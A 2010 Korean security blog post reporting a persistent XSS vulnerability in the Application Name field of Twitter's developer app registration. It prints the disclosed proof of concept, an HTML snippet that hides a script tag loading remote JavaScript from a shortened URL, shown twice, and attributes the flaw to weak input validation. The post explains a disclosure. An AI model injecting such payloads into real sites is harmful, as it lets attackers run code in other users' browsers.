검색결과 리스트
twitter에 해당되는 글 1건
- 2010.06.25 Twitter.com XSS 취약점 공개
글
Twitter.com XSS 취약점 공개
IT/Security/Web
2010. 6. 25. 15:59
Twitter 의 XSS 취약점이 인도네시아 해커 H4x0r-x0x 에 의해 발견되었습니다.
해당 취약점은 예전에 생각해보았던 취약점이었는데, 테스트 해보지 않았던게 아쉽네요. :(
어찌되었던 그동안 XSS와 CSRF 취약점에 한참 시달려오던 Twitter 은 이번에도 예외없이 보안문제로 질타를 받게될 것 같습니다.
문제는 이렇습니다.
바로 저 곳에서 XSS 취약점이 발생한다는 것인데, web에서 작성한 트윗이니 web으로 찍히겠지요. 저기에 직접 스크립트를 삽입하기 위해서는 Application 등록을 해야하는데, 트위터의 개발자 센터의 새 어플리케이션 등록 [ http://dev.twitter.com/apps/new ] 에서 Application Name 을 기입할 때 XSS 코드의 Injection 이 가능합니다.
취약점을 발표한 H4x0r 은 다음과 같은 PoC를 공개했습니다.
<span>via <a href="http://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­erTwi­tter<span
style="visibility: hidden"> <script src='http://is.gd/cWO66' type='text/javascript'></script></a>
</span>
style="visibility: hidden"> <script src='http://is.gd/cWO66' type='text/javascript'></script></a>
</span>
스크립트 삽입이 가능해지면서 공격자의 Party 는 열리게 됩니다. :)
결론적으로, 이번 XSS 취약점은 대부분의 경우가 그렇지만,
"사용자 입력 검증 루틴이 부실했기 때문이다" 라고 이야기할 수 있겠습니다.
결론적으로, 이번 XSS 취약점은 대부분의 경우가 그렇지만,
"사용자 입력 검증 루틴이 부실했기 때문이다" 라고 이야기할 수 있겠습니다.
보다 자세한 정보는 아래의 링크를 참고해주세요.
[ http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/ ]
[ http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/ ]
'IT/Security > Web' 카테고리의 다른 글
| about:blank 가 다른 페이지로 표시될 때 (1) | 2014.07.10 |
|---|---|
| 메가파일 쿠키 스푸핑 취약점 (13) | 2010.07.09 |
